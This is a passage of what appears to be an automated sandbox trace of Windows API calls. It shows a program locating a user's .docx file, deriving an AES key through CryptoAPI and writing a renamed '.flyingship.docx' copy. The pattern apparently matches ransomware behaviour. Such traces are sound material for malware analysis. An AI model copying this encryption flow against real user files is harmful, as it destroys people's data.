wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.300] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xace342c0, ftCreationTime.dwHighDateTime=0x1d5bd3c, ftLastAccessTime.dwLowDateTime=0xdfb517b0, ftLastAccessTime.dwHighDateTime=0x1d5e261, ftLastWriteTime.dwLowDateTime=0xdfb517b0, ftLastWriteTime.dwHighDateTime=0x1d5e261, nFileSizeHigh=0x0, nFileSizeLow=0x15694, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="NqZsz9XCQqe D7p.docx", cAlternateFileName="NQZSZ9~1.DOC")) returned 0x90af58 [0175.300] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0175.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.300] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0175.300] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.300] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.300] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0175.300] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.300] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0175.301] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.301] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.301] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0175.301] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.301] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.301] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.301] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.301] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.301] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0175.301] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.301] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0175.302] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.302] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.302] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0175.302] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.303] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.303] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.303] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.303] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.303] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0175.303] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.303] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.303] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.303] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.303] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.303] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.303] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0175.303] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.303] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.303] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0175.303] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.303] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.303] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0175.303] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.303] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.303] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0175.304] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.304] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.304] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.304] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.304] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.304] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0175.304] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.304] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.304] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0175.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.304] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0175.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.304] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.304] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.305] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.305] CryptHashData (hHash=0x90ae18, pbData=0x8debf0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0175.305] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.305] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.305] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.305] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.305] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.307] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0175.307] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.307] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.307] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0175.307] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.308] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.308] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0175.308] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.308] CryptDestroyHash (hHash=0x90ae18) returned 1 [0175.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nqzsz9xcqqe d7p.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0175.309] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.309] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0175.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0175.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0175.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0175.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0175.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0175.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.310] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0175.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0175.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0175.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0175.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0175.310] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0175.310] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0175.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0175.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0175.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0175.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0175.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0175.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0175.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0175.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0175.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0175.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0175.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0175.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0175.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0175.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0175.312] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0175.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0175.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0175.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0175.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0175.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0175.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0175.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.flyingship.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nqzsz9xcqqe d7p.flyingship.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0175.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0175.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0175.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0175.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0175.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0175.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0175.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0175.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0175.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0175.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0175.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.316] RtlAllocateHeap 